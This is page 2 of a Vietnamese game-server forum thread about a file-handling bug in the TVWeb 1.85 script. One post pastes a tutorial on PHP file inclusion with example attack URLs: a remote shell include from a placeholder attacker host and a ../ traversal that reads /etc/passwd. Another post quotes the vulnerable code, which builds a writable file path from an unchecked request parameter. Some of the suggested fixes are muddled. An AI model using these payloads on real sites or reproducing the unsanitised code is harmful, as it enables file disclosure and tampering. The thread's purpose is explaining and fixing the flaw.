Đã tìm ra nguyên nhân mất thẻ ở TVWeb 1.85 - Trang 2
Follow us on
Follow us on Facebook Follow us on Twitter Linked In Flickr Watch us on YouTube My Space Blogger
 
Trang 2 của 6 Đầu tiênĐầu tiên 1 2 3 4 ... CuốiCuối
Kết quả 11 đến 20 của 56
  1. #11
    Moderator mrrainnt's Avatar
    Ngày tham gia
    Jun 2010
    Bài viết
    1,691
    Thanks
    401
    Thanked 544 Times in 406 Posts

    Ðề: Đã tìm ra nguyên nhân mất thẻ ở TVWeb 1.85

    Trích dẫn Gửi bởi thecong [Only registered and activated users can see links. ]
    cái này fix thôi cần gì xóa.............................................. ...
    ! Thay đổi code ở trên hả bạn ? thêm ký tự vào file .txt hay fix kiểu nào vậy ông ?
    Khách viếng thăm hãy cùng mrrainnt xây dựng diễn đàn CLBGAMESVN vững mạnh nhé!

  2. #12
    2022 thecong's Avatar
    Ngày tham gia
    Apr 2008
    Bài viết
    1,021
    Thanks
    101
    Thanked 158 Times in 80 Posts

    Ðề: Đã tìm ra nguyên nhân mất thẻ ở TVWeb 1.85

    2- Include local file:

    Loại này cũng gần giống như include remote file. Nhưng nó khác ở chổ: biến chứa tên file bị giới hạn bởi một thư mục đứng trước nó.

    Vd: Một file bị lỗi include local file có dạng như sau:

    ---------BEGIN of test3.php-------

    CODE <?php

    include(“/home/$file”);

    […]

    ?>

    ----------END of test3.php---------

    Xin chú ý là biến $file chưa được khai báo.
    Nếu ta dùng:

    [Only registered and activated users can see links. ] ([Only registered and activated users can see links. ]).[target].com/test3.php?file=http://www.[attacker].com/remview.php

    Thì trong code của file test3.php sẽ trở thành như sau:

    ---------BEGIN of test3.php-------

    CODE <?php

    include(“/home/http://www.[attacker].com/remview.php”);

    […]

    ?>

    ----------END of test3.php---------

    Một đường dẫn vô nghĩa. Do đó ta không thể include được file ta muốn.

    Bấy giờ ta chỉ có thể sử dụng cách sau:

    [Only registered and activated users can see links. ] ([Only registered and activated users can see links. ]).[target].com/test3.php?file=../../../../../../../../etc/passwd

    Link trên đã khai báo biến $file với giá trị là: “../../../../../../../../etc/passwd”. Lúc này code của file test3.php có dạng:

    ---------BEGIN of test3.php-------

    CODE <?php

    include(“/home/../../../../../../../../etc/passwd”);

    […]

    ?>

    ----------END of test3.php---------

    Các kí tự : “../../” đã giúp ta vượt qua các cấp thư mục trở về thư mục gốc”/” (đối với Linux) và sau đó là include file /etc/passwd. Thế là toàn bộ nội dung file passwd sẽ được hiển thị trên trình duyệt của attacker. Ta có thể thay thế /etc/passwd bằng bất cứ file nào ta muốn include (+xem). Xin chú ý: càng dùng nhiều kí tự “../” càng tốt vì nó sẽ đảm bảo đưa ta đến thư mục gốc.

    II- Khắc phục:

    Khắc hục lỗi file include này theo tớ là đơn giản hơn fix các lỗi khác nhiều.
    Nếu sản phẩm bạn code chưa mắc lỗi hay đã này thì tôi xin khuyên bạn vài điều để hạn chế việc mắc phải lỗi này.

    + Hạn chế dùng các biến trong các hàm (include và require), nếu đã dùng nên đảm bảo các biến đó đã được khai báo đầy đủ và chính xác. Nếu bạn vẫn thích dùng biến thay thế cho đường dẫn thì tại sao bạn không dùng hàm define() nhỉ? Hàm này không cho phép user khai báo từ bên ngoài, hoặc bạn có thể dùng các kí tự đại diện cho các cấp thư mục như: “./” (thư mục hiện hành), “../” (thư mục cấp trên).

    + Hạn chế việc khai báo biến phụ thuộc vào nguời dùng cuối như ở Vd 2. Nên khai báo trực tiếp biến đó.
    Ký cái gì?

  3. #13
    Thành Viên YeuVo_ThuongCon's Avatar
    Ngày tham gia
    May 2006
    Đang ở
    Chuyển bị lặn
    Bài viết
    482
    Thanks
    13
    Thanked 357 Times in 119 Posts

    Ðề: Đã tìm ra nguyên nhân mất thẻ ở TVWeb 1.85

    Dây là lỗi do chủ quan
    Ku Phương hay chủ quan một số vấn đề

    Cái này chắc ku Phương biết rõ nhất
    Các PRO Tha Em

  4. #14
    Moderator mrrainnt's Avatar
    Ngày tham gia
    Jun 2010
    Bài viết
    1,691
    Thanks
    401
    Thanked 544 Times in 406 Posts

    Ðề: Đã tìm ra nguyên nhân mất thẻ ở TVWeb 1.85

    Theo bác là nên như thế nào hả bác
    đặt nhiều dấu / / / / / vào code đó hay sao thế ông thecong ?
    Khách viếng thăm hãy cùng mrrainnt xây dựng diễn đàn CLBGAMESVN vững mạnh nhé!

  5. #15
    Vi phạm quy định hoangtu_eck94's Avatar
    Ngày tham gia
    Jan 2010
    Bài viết
    1,371
    Thanks
    392
    Thanked 935 Times in 348 Posts

    Ðề: Đã tìm ra nguyên nhân mất thẻ ở TVWeb 1.85

    nếu là do lỗi ở file
    server/log/index.php
    thì theo mình có thể đổi tên file đó đi cũng đc nhỉ? ^^
    Server SCF Full Customs Wing, HP, SD, Antihack, Post Item, Fix Bug.......
    Skype: hoangtu_eck94

  6. #16
    2022 thecong's Avatar
    Ngày tham gia
    Apr 2008
    Bài viết
    1,021
    Thanks
    101
    Thanked 158 Times in 80 Posts

    Ðề: Đã tìm ra nguyên nhân mất thẻ ở TVWeb 1.85

    Trích dẫn Gửi bởi hoangtu_eck94 [Only registered and activated users can see links. ]
    nếu là do lỗi ở file thì theo mình có thể đổi tên file đó đi cũng đc nhỉ? ^^
    ừ hoặc có thể move nó đi chỗ khác, còn ai biết thì fix lỗi đó, lỗi đó đơn giản ý mà

    Khắc hục lỗi file include này theo tớ là đơn giản hơn fix các lỗi khác nhiều.

    + Hạn chế dùng các biến trong các hàm (include và require), nếu đã dùng nên đảm bảo các biến đó đã được khai báo đầy đủ và chính xác. Nếu bạn vẫn thích dùng biến thay thế cho đường dẫn thì tại sao bạn không dùng hàm define() nhỉ? Hàm này không cho phép user khai báo từ bên ngoài, hoặc bạn có thể dùng các kí tự đại diện cho các cấp thư mục như: “./” (thư mục hiện hành), “../” (thư mục cấp trên).


    Ký cái gì?

  7. #17
    Vi phạm quy định hoangtu_eck94's Avatar
    Ngày tham gia
    Jan 2010
    Bài viết
    1,371
    Thanks
    392
    Thanked 935 Times in 348 Posts

    Ðề: Đã tìm ra nguyên nhân mất thẻ ở TVWeb 1.85

    Trích dẫn Gửi bởi thecong [Only registered and activated users can see links. ]
    ừ hoặc có thể move nó đi chỗ khác, còn ai biết thì fix lỗi đó, lỗi đó đơn giản ý mà

    Khắc hục lỗi file include này theo tớ là đơn giản hơn fix các lỗi khác nhiều.

    + Hạn chế dùng các biến trong các hàm (include và require), nếu đã dùng nên đảm bảo các biến đó đã được khai báo đầy đủ và chính xác. Nếu bạn vẫn thích dùng biến thay thế cho đường dẫn thì tại sao bạn không dùng hàm define() nhỉ? Hàm này không cho phép user khai báo từ bên ngoài, hoặc bạn có thể dùng các kí tự đại diện cho các cấp thư mục như: “./” (thư mục hiện hành), “../” (thư mục cấp trên).


    ừm. theo c là đơn giản và dễ vì c am hiểu về web. nhưng đối vs những ng gà về web thì đổi tên or move là đơn giản nhất. điển hình là t.
    Server SCF Full Customs Wing, HP, SD, Antihack, Post Item, Fix Bug.......
    Skype: hoangtu_eck94

  8. #18
    Moderator mrrainnt's Avatar
    Ngày tham gia
    Jun 2010
    Bài viết
    1,691
    Thanks
    401
    Thanked 544 Times in 406 Posts

    Ðề: Đã tìm ra nguyên nhân mất thẻ ở TVWeb 1.85

    ! Sao không ai bày cách fix hết nhỉ, fix cho nó ngon lành ! move đi thì k hiển thị được log của Server nữa à ?
    Khách viếng thăm hãy cùng mrrainnt xây dựng diễn đàn CLBGAMESVN vững mạnh nhé!

  9. #19
    2022 thecong's Avatar
    Ngày tham gia
    Apr 2008
    Bài viết
    1,021
    Thanks
    101
    Thanked 158 Times in 80 Posts

    Ðề: Đã tìm ra nguyên nhân mất thẻ ở TVWeb 1.85

    Trời nói thế mà các cậu ko hiểu ý tớ chỉ cách fix à

    nguyên nhân do 2 dòng này

    $file_log = "modules/".$module.".txt";

    action = $_GET['action'];if (isset($action)) { $file_log = "modules/".$action.".txt"; $fopen_data = fopen($file_log, "w+"); fclose($fopen_data);}

    lỗi này sảy ra khi biến chứa tên file bị giới hạn bởi một thư mục đứng trước nó.

    ở đây biến là cái $action trong lập trình php thì để khai biến thì người ta dùng cái $ten biến

    ở đây biến $action bị giới bạn bởi 1 thư mục trước nó để khắc phục cách này

    bạn có thể dùng các kí tự đại diện cho các cấp thư mục như: “./” (thư mục hiện hành), “../” (thư mục cấp trên).
    Ký cái gì?

  10. #20
    Thành Viên
    Ngày tham gia
    Oct 2007
    Bài viết
    157
    Thanks
    0
    Thanked 1 Time in 1 Post

    Ðề: Đã tìm ra nguyên nhân mất thẻ ở TVWeb 1.85

    Hay tốt lắm cu em, cố gắng lên, sắp tới vào đầu quân Cty anh
    Khách viếng thăm hãy cùng NhocCoi xây dựng diễn đàn CLBGAMESVN vững mạnh nhé!

 

 
Trang 2 của 6 Đầu tiênĐầu tiên 1 2 3 4 ... CuốiCuối

Các Chủ đề tương tự

  1. Cần giúp đỡ về TVWeb 1.85
    Bởi kunyeudung trong diễn đàn Hỏi Đáp/ Yêu Cầu
    Trả lời: 4
    Bài viết cuối: 25-08-11, 02:45 AM
  2. Lỗi bảng xếp hạng tháng TVWeb 1.85
    Bởi whylove trong diễn đàn Hỏi Đáp/ Yêu Cầu
    Trả lời: 4
    Bài viết cuối: 16-08-11, 08:57 PM
  3. Help TVWEB 1.85
    Bởi gauandy trong diễn đàn Hỏi Đáp/ Yêu Cầu
    Trả lời: 3
    Bài viết cuối: 21-06-11, 08:17 AM
  4. Lỗi Web TVweb 1.67
    Bởi daiuycong trong diễn đàn Hỏi Đáp/ Yêu Cầu
    Trả lời: 3
    Bài viết cuối: 16-11-10, 05:38 PM
  5. Cần Giúp Về TVWeb
    Bởi daiuycong trong diễn đàn Hỏi Đáp/ Yêu Cầu
    Trả lời: 0
    Bài viết cuối: 07-11-10, 01:36 PM

Quyền viết bài

  • Bạn Không thể gửi Chủ đề mới
  • Bạn Không thể Gửi trả lời
  • Bạn Không thể Gửi file đính kèm
  • Bạn Không thể Sửa bài viết của mình
  •  
Múi giờ GMT +7. Bây giờ là 08:55 AM.
vBulletin®, Copyright ©2000-2011, Jelsoft Enterprises Ltd.
CLBGamesVN không chịu trách nhiệm về Luật Bản Quyền của các tài liệu, bài viết v.v...được đăng tải trên diễn đàn này.
Diễn đàn phát triển dưới sự đóng góp của tất cả thành viên. BQT chỉ là những người thành lập ra sân chơi, quản lý và duy trì về mặt kỹ thuật, nội dung khi hợp lệ.